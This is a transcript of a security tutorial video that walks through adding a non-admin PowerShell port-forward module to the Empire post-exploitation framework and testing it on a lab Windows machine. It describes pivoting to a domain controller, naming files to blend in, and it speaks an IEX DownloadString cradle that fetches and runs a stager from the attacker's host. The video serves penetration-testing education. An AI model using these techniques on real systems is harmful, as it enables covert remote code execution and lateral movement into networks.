What's going on, YouTube? This is Ipsec, and we're doing something a little bit different and just recording a how-to video. I needed something short and sweet to upload to YouTube so I could test out a new microphone. Hopefully, I sound much better. Anyways, the module we're going to add to Empire was created by Decoder. He just published it today, and it was doing a port forward in PowerShell. Of course, you can do this in Metasploit or Cobalt Strike, but without those two, it's pretty hard to do a port forward without admin rights. Of course, you have NetSH port proxy, but well, it requires admin. So this module does it, and the purpose of it is, let's say we're the attacker machine on the left. We get a foothold on patient 0, and we can use patient 0 to execute code on a domain controller in the server farm on the right. The domain controller may not be able to talk to the internet, which means it can't talk to us. So we create a reverse proxy on patient 0, which means, hey, patient 0, listen on port 9000, anything that comes in, send it back to us. So then the domain controller in that server firm is going to talk to patient 0 on port 9000, which is allowed, and then patient 0 is going to forward that all the way to the internet and then to us. So that is the purpose of the port proxy. With that being said, let's just jump in. Before we begin actually writing an Empire module or adding a module to Empire, we have to first download Empire and download what we want to add to it. So I'm going to go to GitHub and Empire, and then click on that first result, and we'll do a git clone to start downloading this project. I'm also going to go to twitter.com/decoder_IT, and this guy wrote the PowerShell script I want to add to Empire. So if I click here, we can download the PowerShell port forward script as well. And let's just go into Empire, start the install, and then while it installs, we'll explain exactly how to do these things or how it works. It's really simple. This video shouldn't go too long. So that's going, and we'll just look at the directory structure of Empire. We have data, lib, plugins, and setup. Well, we know what setup is. We just went in there to install it. There's plugins, which you can create a plugin for Empire that's not like modules that you're thinking about, like Metasploit modules. The modules itself, you need two directories. You need the data directory and the lib directory. Data is where the PowerShell scripts go. So if we go in data, we can see like module source. And then it's a listing of all the modules in Empire. We're going to do a lateral movement one. So we'll look at these, and you can see just regular PowerShell scripts. You could execute these natively if you wanted to. There's nothing specific to Empire in these scripts. So let's go back to the parent directory and look at lib. So if we go in lib, we have common, listeners, modules, PowerShell, and stagers. Well, we want to go into PowerShell because this is going to be where the actual scripts are. If we do it ls, nope. We actually want to go into modules, not PowerShell. And then we have exfil, external, PowerShell, and Python. So PowerShell is where all the PowerShell modules are. And there's also this handy dandy PowerShell Template.py. I'm going to copy this into the how to add module, the parent directory where we started, because that's the template to create a Empire script. So if we go into PowerShell, we can see it's pretty much exactly the same thing. They're all Python scripts, and we'll go into the script once we start creating it, but you can look at one, like invoke psexec.py, and you can see this is just the description stuff of how it runs, different arguments you can add to it, generator, some snippets so it can do the invoke obfuscation. But we got all we need out of that. So let's just go back to how to add module, and let's edit this PowerShell template. So the beginning, the name of this, we're going to call this invoke port forward. The author, we're going to put decoder_IT because he created this PowerShell module, and now I'm going to put myself as well. The description, let's just say this forwards a port. I don't know what else to put, so we'll just make it simple, this forwards the port. The background, we're going to set this to true. What this means is, should Empire throw this into the background, the script is not going to ever finish. So we want to background it. If it was like power up or other things, we'd set background to false because we just want to see the output. We don't want that to go in the background. We want to run and view the result. For a port proxy, we want it to run and stay running forever, so we're going to throw it in the background. If you didn't set this to true, then the agent would go stale as soon as it runs because it would never check in because this program would never finish. The output extension, we don't have to do this because we're not saving a file. Does it need admin rights to run? No. This is one of the few ways to make a port proxy work without admin rights. OPSEC safe, I think I'm going to put false because I don't know how to kill this job once I start it. So I'm going to put false there. There may be a way in Empire to kill things that start in the background, but I'm not sure. So the only way I kill this is by killing the whole agent. And before I do that, I spawn a new agent and then link to any reference. So here we can link the GitHub page where we found this. Then we can go down the options. So examples, the agent is required, and then everything else after this is not required. So delete that command, and we're going to add 4 more. Because if we look at decoder script, it's going to take 4 arguments: the local IP, the local port, the remote IP, and the remote port. So the description, command to execute, this will be the listener IP address required. It's going to be true. The value, nothing. And let's see. This is the variable argument, so we'll call this listener IP. The next one we're going to call listener port, and this will be the port to listen on. The value still going to be blank. Next one is going to be the IP address to forward to. And we can call this variable remote IP. Again, there's no value. And finally, we need remote port, and this will be the port to forward to. And after each one of these, there needs to be a comma. That looks good. Main menu. This is generating, so right here, this module code is reading in the PowerShell script, and we need to edit the path right here, the data module source. So if we open a new tab, how to add module Empire, go in Empire, we want to add it to, let's say, data module source, lateral movement, and we'll call it like port forward.ps1. So lateral movement port, we'll call it invoke port fwd.ps1. So if we go into this directory, everything is invokes. So I'm going to call it invoke just so it blends in. Okay, we got that. So it's going to read that script. And then we just want to do something with the script end. If we didn't want to do in the data, we could have left that script equals and then just wrote our command there. And the script is going to end with invoke port forward dash Oh, we don't do any options. We just leave it like that. Because down here, the next line is going to go through every single option and add dash like listener IP space the listener IP, remote IP, etc. So that's going to handle everything. So this runs a module code, which is just going to set up the function. It's going to load so PowerShell knows what invoke port forward is. And then script end is going to be the line that actually invokes what it just loaded. And then everything after that gets added here as options, and that should be good. I'm just going to go very top real quick, give it a sanity check, see if I have any issues. It looks good. Agent, listener. Yep, I'm happy with that. So we're going to copy PowerShell template into Empire lib modules PowerShell lateral movement. And we'll call this port fwd.py. If we look in that directory, they don't follow the same naming convention as they do on data. So if we just look at this, we can see everything is similar. We can actually move port forward to invoke underscore so it blends in. It's always important to try to stay as close to the convention as possible. And now we have to get decoder script, which is port forward.ps1. We have to make this lately compatible with Empire. Let's see, I still have that Twitter. There we go. Hopefully it wasn't that long. There was a box like right up here I noticed. So this is going to be .NET code. I'm going to add the type and then call it like this. So Empire is not going to like this because of how the arguments are. So what we have to do is wrap this into a function. So I'm going to call function invoke port forward. What did I call it before? Go back to 2. I just hit enter because I was finishing the install process. Vim, was it? Plugins, lib. Nope, not plugins, lib. Lib modules, PowerShell, lateral movement, invoke, port forward. What do we call this? Port FWD. Port FWD. Then we got to give the param. And then we got to create the variables. So it's going to be a string. And then listen IP. Then we do listen port. Then remote IP. And remote port. So that's how you set like named variables in PowerShell. Because it's going to be called with dashes. So just below that, we can indent this. And start port forward, we can remove all those and just use a variable. So listen IP, listen port, remote IP, and remote port. And that bracket. And then this gets called by like invoke port FWD, listen IP, listen port, and you get the deal. It goes on from there. So that is created. We can move the PowerShell template, port forward.ps1, I mean. So move this into Empire data module source PowerShell. Nope. Module source lateral movement invoke port fwd.ps1. And I think that's what I had called it. Go back here. Invoke port fwd.ps1. That looks correct. So we should now be able to go into Empire, execute Empire, Seems to have loaded everything. Is there a search module? We can search for port, FWD, and now we have the module here. So let's test this out. So I'm going to go listeners, use listener, HTTP. Then let's set the host to be HTTP 10.10.14.3, which is my IP. We'll set it on port 8001. We also got to set the bind port to be 8001 now, and we can execute this listener. Then we can do the command launcher, PowerShell, and copy this. And then let's make the directory www and put this code. So this will be empire.ps1. We'll call this. Paste. PowerShell. Python. Wow. There we go. Then I'm actually going to go over to Tally. It's just a Windows box I had ready to go. So we'll try to load PowerShell. This is going relatively slow. There we go. IX new object net.web client download string HTTP 10.10.14.3 empire.ps1. That should load Empire. If we go here, we have the agent is now set to active, so we can interact with it. If we go back, agents, interact, UC. And I'm going to do a spawn as real quick, or a spawn, specify HTTP. So I have a background agent. Whenever I run a script that I think may just hang or kill my agent, I always get two agents, so I don't have to go and type that IEX command again. So now we have two running. We can interact with UC again. If we go to info, we can use module, what is it? Lateral movement, port forward. Invoke port forward. Info. And we can set the remote port to be 80. And then we can set listener IP to be 127.0.0.1. I know I'm making these a bit weird. It's just how they got ordered on these options page. I wonder if there's a way to set index on options. Set listener port. Let's listen on 9001 because, well, we got to go above 9000. Invalid option. Typo. Those will get you every time. Set the remote IP now to be me. 10.10.14.3. Right? 10.0. Yep. Okay. So now that is all set up. If we do info again, we see that we're going to listen on localhost 127.0.0.1 on port 9001, and any connection that goes into that port, we're going to forward it to 10.10.14.3 on port 80. So if we execute, module's not OPSEC safe because, again, I set that. I don't know how to kill it, so we did that. Is there a jobs command or something? I don't know. If we go back, agents, creds, jobs, task ID. That doesn't seem to be it. Yeah, I don't know how to kill the port forward once it starts, but if we didn't make a mistake, we should be listening on localhost 9001. Was it 9001? Let's see. Yep, 9001. So let's see if I coded everything correct for the first time. Probably not. Things generally don't go that well for me. Localhost 9001, problem loading page. So we are not listening. If we go back and then interact with the agent again, maybe it'll give us an error message or maybe not. So let us load PowerShell and run this manually because again, none of the Empire things or the PowerShell scripts in Empire aren't Empire specific. So I can just go, once this loads, IEX new object net web client dot download string 10.10.14.3, and we want to go, what is it called? Copy this to www port fwd.ps1. So it should be grabbing that script. It got it. Okay. So invoke, and before we do this, let's just test 127.0.0.1, just in case that's not set. One 127.0.0.1. The VM's going slow. Nope. So we're going to invoke listen IP as 127.0.0.1, listen port 9002, remote IP 10.10.14.3, remote port 80. Looks like it's working. 9002, that worked. We see the script indeed does work. So Empire error somewhere because 9001 is definitely not working. So let's see. Use module info remote 80 10.10.14.3 9001. We can execute this again to see if it works. We should also go agents, make sure it's not stale. So 57 is the last check-in. They both checked in, so that's definitely run by now. And no, it's not. So let's take a look at what is going on. So if we go into the data module source, lateral movement invoke port forward.ps1, that looks good. That's the same script we are running. So let us go into the module. So lib modules PowerShell lateral movement invoke port forward. So the name, this stuff doesn't matter. Listener IP, listener port, list remote. Do I have listen? I may have listen on my thing. Yeah, I did listen. So let's change that. Put those to listen. Go back to Empire, go to the main menu, reload, and then we want PowerShell lateral movement, invoke, port forward. Relearning that module, we can interact with our agent, and we have to use module now. And it erased all the options, so I'm just going to do Control-R and type E capital P to do recursive search my history for that command and type it for me. So, NPO. Oh, because listener was R, so RP. So we got to actually set this. Listen port to be 9003, I guess. I forget what I set it as. Set listen IP to be 127.0.0.1. Set remote IP to be 10.10.14.3. Now we do info. Everything's set. We execute this. And let's hope that on 9003, it is giving us our box. There we go. So that is all set up. So now that box is forwarding a port without administrator rights. So hope you guys enjoyed that little trick and hope my quality of the mic is good. Take care and I will see you later.